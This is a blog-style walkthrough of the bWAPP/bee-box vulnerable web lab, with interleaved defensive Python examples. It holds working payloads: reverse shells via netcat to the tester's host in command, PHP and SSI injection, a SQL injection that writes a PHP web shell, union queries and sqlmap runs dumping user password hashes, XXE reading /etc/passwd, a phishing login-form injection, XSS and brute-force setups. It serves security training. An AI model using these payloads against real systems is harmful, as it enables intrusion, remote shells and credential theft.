bWAPP Practice

Author: 全栈程序员站长
Published 2022-11-09 20:23:25

Hello everyone, we meet again; I'm your friend 全栈君.

Introduction

Virtual machine download: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

If you would rather deploy the environment yourself: https://sourceforge.net/projects/bwapp/files/bee-box/

bWAPP contains more than 100 vulnerabilities, covering the OWASP Top 10 risks; a very satisfying PHP web target.

Log in with username: bee, password: bug. The vulnerability level can be raised to increase the difficulty: low -> medium -> high.


For details, consult the relevant documentation; let's have fun taking down the little bee.

0x001 Reconnaissance

However you go about it, the VM has to be reconnoitred first; the basic routine is to pull out Nmap and give it a scan.

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_  2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp   open  smtp          Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
| fingerprint-strings: 
|   GenericLines, beast2: 
|     *** bWAPP Movie Service ***
|_    Matching movies: 0
3306/tcp open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open  vnc           VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
6001/tcp open  X11           (access denied)
8080/tcp open  http          nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg: 
|_  http/1.1
9080/tcp open  http          lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/4%Time=5C06158B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,400,"\*\*\*\x20bWAPP\x20Movie\x20Service\x20\*\*\*\nMatching\
SF:x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0")%r(beast2,400,"\*\*\*\x20bWAPP\x20Movie\x20Service
SF:\x20\*\*\*\nMatching\x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:  bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: bee-box
|_  System time: 2018-11-07T11:27:32+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
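The scan above is useful beyond picking targets: a defender reviewing a host like this wants the same output turned into a triage list. The Python below is an added example (not part of the original write-up, and not an Nmap feature) that parses lines in the shape of the normal-format output shown above, attaches script results to their port, and flags the findings visible here: SSLv2 on the mail port, the TRACE method on the web server, and broadly exposed services such as FTP, Samba and VNC. SAMPLE_SCAN is constructed from a few of the lines above, and the REVIEW_SERVICES policy set is an assumption made for the example.

```python
import re

# Constructed sample in the shape of the Nmap output above (added example,
# not the original scan; only a few lines are reproduced).
SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp   open  smtp          Postfix smtpd
| sslv2: 
|   SSLv2 supported
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5)
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
5901/tcp open  vnc           VNC (protocol 3.8)
"""

# One port line: "<port>/<proto> <state> <service> [<version>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Services that go on a review list whenever they are exposed (clear-text or
# broad-exposure protocols). This is an assumed policy for the example.
REVIEW_SERVICES = {"ftp", "netbios-ssn", "vnc", "exec", "login", "shell", "X11"}


def parse_nmap(text):
    """Return a list of {port, proto, state, service, version, notes} dicts.

    NSE script lines (starting with '|') are attached as notes to the most
    recently seen port, so a finding can be tied back to its service."""
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "notes": []}
            services.append(current)
        elif line.startswith("|") and current is not None:
            # strip the "|", "|_" and indentation that Nmap prefixes
            current["notes"].append(line.lstrip("|_ ").rstrip())
    return services


def risk_findings(services):
    """Map parsed services to (port, finding) pairs a defender would triage."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        notes = " ".join(s["notes"])
        if "SSLv2 supported" in notes:
            findings.append((s["port"], "SSLv2 enabled (obsolete protocol)"))
        if "TRACE" in notes:
            findings.append((s["port"], "HTTP TRACE method enabled"))
        if s["service"] in REVIEW_SERVICES:
            findings.append((s["port"], f"review exposure of {s['service']}"))
    return findings


if __name__ == "__main__":
    for port, finding in risk_findings(parse_nmap(SAMPLE_SCAN)):
        print(f"{port:>5}  {finding}")
```

Against the full scan above, the same parser would also pick up SSLv2 on 443 and the SMB "message_signing: disabled" host-script line if a rule for it were added; the point is that the review list is derived from the scan text rather than from memory.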

With a basic picture of the host, let's start practising the vulnerabilities.

0x002 A1 Injection

1.HTML Injection – Reflected (GET)

Check whether the form uses GET or POST: open the browser, press F12, view the page source and search for "First name:". To make replaying requests convenient, use Burp Suite.

<form action="/bWAPP/htmli_get.php" method="GET">

Injecting an HTML <a> tag: <a href=http://www.baidu.com>点此领取奖励</a>

<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js to steal the cookie; you can expand on this idea, all roads lead to Rome

At the medium level the injection no longer works, so try URL-encoding the payload. The high level still could not be bypassed; I'm not very familiar with PHP.

<a href=http://www.baidu.com>点此领取奖励</a>
#URL-encoded
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E
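Why URL-encoding gets past the medium level but not the high level comes down to the order of filtering and decoding. The Python below is an added example, not bWAPP's own PHP: it models a filter that neutralises angle brackets and then URL-decodes the value (an assumed approximation of the medium-level behaviour, not a reading of the real source), beside the hardened order of decoding first and HTML-escaping at the point of output. ENCODED_PAYLOAD is the encoded <a> payload from above with the link text replaced by "click", and render_greeting is a stand-in for the reflected page.

```python
import html
from urllib.parse import unquote

# Constructed test input: the URL-encoded <a> payload, link text shortened.
ENCODED_PAYLOAD = "%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3Eclick%3C%2Fa%3E"


def filter_then_decode(value):
    """Model of the order-of-operations mistake (an assumption about the
    medium level, not bWAPP's code): brackets are neutralised first, then
    the value is URL-decoded, so encoded brackets pass the filter and are
    reconstituted by the decode."""
    value = value.replace("<", "&lt;").replace(">", "&gt;")
    return unquote(value)


def decode_then_escape(value):
    """Hardened order: canonicalise (decode) first, then HTML-escape where
    the value is written into the page. quote=True also escapes quotes so
    the result is safe inside attribute values."""
    return html.escape(unquote(value), quote=True)


def render_greeting(first_name, sanitizer):
    """Stand-in for the reflected page: the name is echoed into HTML."""
    return f"<p>Welcome {sanitizer(first_name)}</p>"


if __name__ == "__main__":
    print(render_greeting(ENCODED_PAYLOAD, filter_then_decode))
    print(render_greeting(ENCODED_PAYLOAD, decode_then_escape))
```

The general rule the example illustrates: decode every transport encoding (URL, base64, whatever the channel adds) before validation, and apply the output encoding for the destination context last, after the value can no longer change.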

2.HTML Injection – Reflected (POST)

<a href=http://www.baidu.com>点此领取奖励</a> #low
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium

At high, the only way to cheat is to tamper with the request data... utterly shameless!!!

POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #change to 1 or 0
Connection: close
Upgrade-Insecure-Requests: 1
firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit

3.HTML Injection – Reflected (URL)

#low the reflected URL can be modified arbitrarily
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script>  HTTP/1.1
Host: 192.168.1.104 #the IP address can be modified arbitrarily

4.HTML Injection – Stored (Blog)

<a href=http://www.baidu.com>点此领取奖励</a> #low arbitrary code can be written in and executed
#fake login form
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

5.iFrame Injection

#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000 
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>

6.LDAP Connection Settings

#not configured; you need to set it up yourself
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #install the web UI
clear=* #injection

7.Mail Header Injection (SMTP)

test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com

8.OS Command Injection

#low
; whoami
www.nsa.gov && nc -vn  192.168.1.101 4444 -e /bin/bash  
#listener
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#medium
www.nsa.gov | nc -vn  192.168.1.101 4444 -e /bin/bash

At high it is hard to bypass by hand, so bring out the tools; rather than all that hassle, just go at it directly.

commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"

9.OS Command Injection – Blind

#low
127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash
#high: just use commix directly
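The payloads in sections 8 and 9 work because the target parameter is spliced into a shell command line, so `;`, `&&` and `|` change what the shell runs. The Python below is an added example of the server-side fix, not bWAPP code: an allow-list check that accepts only a DNS hostname or an IP literal, and a lookup that hands the target to subprocess as a single argv element with no shell involved. HOSTNAME_RE, is_valid_target, build_lookup_command and run_lookup are names chosen for this example, and nslookup is assumed to be the command the page's lookup feature wraps.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_target(target):
    """Allow-list check: an IP literal or a hostname, nothing else.

    Shell metacharacters (;, &&, |, backticks, spaces) can never pass,
    because none of them is a legal character in either form."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(target) is not None


def build_lookup_command(target):
    """Return the argv list for the lookup.

    Passing a list to subprocess (no shell=True) makes the target a single
    argument even if it contained metacharacters; the allow-list check on
    top of that is defence in depth and also rejects nonsense input."""
    if not is_valid_target(target):
        raise ValueError(f"invalid target: {target!r}")
    return ["nslookup", target]


def run_lookup(target):
    """Execute the lookup without a shell and return its output as text."""
    cmd = build_lookup_command(target)
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    for candidate in ("www.nsa.gov", "127.0.0.1", "; whoami", "127.0.0.1 | id"):
        print(f"{candidate!r}: valid={is_valid_target(candidate)}")
```

Note that the validation and the argv construction are separate functions: the validator can be unit-tested with hostile inputs without ever executing anything, which is how a reviewer would check that the page's payload shapes are refused.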

10.PHP Code Injection

#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn  192.168.1.101 4444 -e /bin/bash')
#you can also run wget http:// to download a web shell and get a shell directly; this is stealthier than the Swiss army knife (nc) and reverse-shell approaches

11.Server-Side Includes (SSI) Injection

#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->
#receiver
nc -nlvp 4444

12.SQL Injection (GET/Search)

#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #
iron' union select 1,login,password,email,5,6,7 from users #
#the obtained password hashes can then be cracked
john --format:raw-sha1 /root/password.txt --show
?:bug
1 password hash cracked, 0 left
iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #

13.SQL Injection (GET/Select)

movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go

14.SQL Injection (POST/Search)

POST submits the parameters; same principle
AJAX: simply put, the query fires as soon as a parameter is entered; same principle as GET/POST injection
AJAX can be synchronous or asynchronous
' '
1' union select 1,2,3,4,5,6,7#
1' union select 1,login,3,email,password,6,7 from users#
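Sections 12 through 14 share one root cause: the title or id is concatenated into the SQL text, so a quote ends the string literal and what follows is parsed as SQL. The Python below is an added example, not bWAPP code, using an in-memory SQLite table with constructed rows (not the real movies table): it runs the vulnerable concatenation beside a bound-parameter query on the same input, and adds a small heuristic detector of the kind a log reviewer might run over request parameters. SQLite uses `--` for comments where the MySQL payloads above use `#`, so the test input is written that way.

```python
import sqlite3


def make_db():
    """In-memory movies table with constructed rows (not bWAPP's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO movies (title) VALUES (?)",
                     [("Iron Man",), ("The Matrix",), ("Inception",)])
    return conn


def search_vulnerable(conn, title):
    """Concatenation: the input is parsed as SQL, so a quote ends the literal
    and the rest of the input becomes part of the WHERE clause."""
    sql = "SELECT title FROM movies WHERE title LIKE '%" + title + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, title):
    """Bound parameter: the input is always a string value, never SQL text.
    The LIKE wildcards are added to the value, not to the statement."""
    sql = "SELECT title FROM movies WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + title + "%",))]


def looks_like_sqli(value):
    """Triage heuristic for log review: a quote together with a SQL keyword
    or comment marker. Useful for spotting probes in access logs; it is not
    a defence and must not replace parameterization."""
    lowered = value.lower()
    markers = (" or ", " union ", "--", "#", "/*")
    return "'" in value and any(m in lowered for m in markers)


if __name__ == "__main__":
    db = make_db()
    probe = "Iron' OR 1=1 --"
    print("vulnerable:", search_vulnerable(db, probe))
    print("parameterized:", search_parameterized(db, probe))
    print("flagged:", looks_like_sqli(probe))
```

The same change applies to the `movie=` select parameter in section 13: bind it as an integer parameter, and reject anything that does not parse as one before the query is built.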

15.SQL Injection – Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>
#inspect the data in Burp

SqlMap: dumping the database

sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs
available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql
--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database:    'bWAPP'
--current-user
[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user:    'root@localhost'
--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'
--passwords
cracked password 'bug' for user 'root' #stopped it here, didn't let it keep running
-D bWAPP --tables
[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog     |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+
-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+
-D bWAPP -T users -C password --dump
Database: bWAPP                                                                
Table: users
[2 entries]
+------------------------------------------------+
| password                                       |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+
--dump-all   #dump the whole database directly
#cracking passwords locally takes too long; you can push the job to a server and let it run there.

0x003. A2 – Broken Auth. & Session Mgmt

1.Broken Auth. – CAPTCHA Bypassing

#brute-force with Burp Intruder
login=§test§&password=§123456§&captcha_user=zq9mso&form=submit

2.Broken Auth. – Forgotten Function

email=§12312414%40163.com§&action=forgot  #brute-force guessing

3.Session Mgmt. – Administrative Portals

admin=1

4.Session Mgmt. – Cookies (Secure)

security_level=0; top_security=no<script>alert(1)</script>
Connection: close

5.Session Mgmt. – Session ID in URL

smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c

0x004. A3 – Cross-Site Scripting (XSS)

1.XSS – Reflected (GET) (POST)

<script>alert(document.cookie)</script>

2.XSS – Reflected (JSON)

<svg onload=prompt(0)>

3.XSS – Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

4.XSS – Reflected (Back Button)

Referer: ';alert(1);'

5.XSS – Reflected (Custom Header)

bWAPP: <script>alert(1)</script>

6.XSS – Reflected (Eval)

date=alert(1)

7.XSS – Reflected (HREF)

Referer: <script>alert(1)</script>

8.XSS – Reflected (User-Agent)

User-Agent: <script>alert(1)</script>

0x005. A4 – Insecure Direct Object References

1.Insecure DOR (Change Secret)

secret=1&login=test&action=change

2.Insecure DOR (Reset Secret)

<reset><login>bee</login><secret>Any bugs?</secret></reset> #can be modified arbitrarily
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
<login>&test;</login>
<secret>login</secret>
</rest>

3.Insecure DOR (Order Tickets)

ticket_quantity=1&ticket_price=15&action=order #modify the hidden field
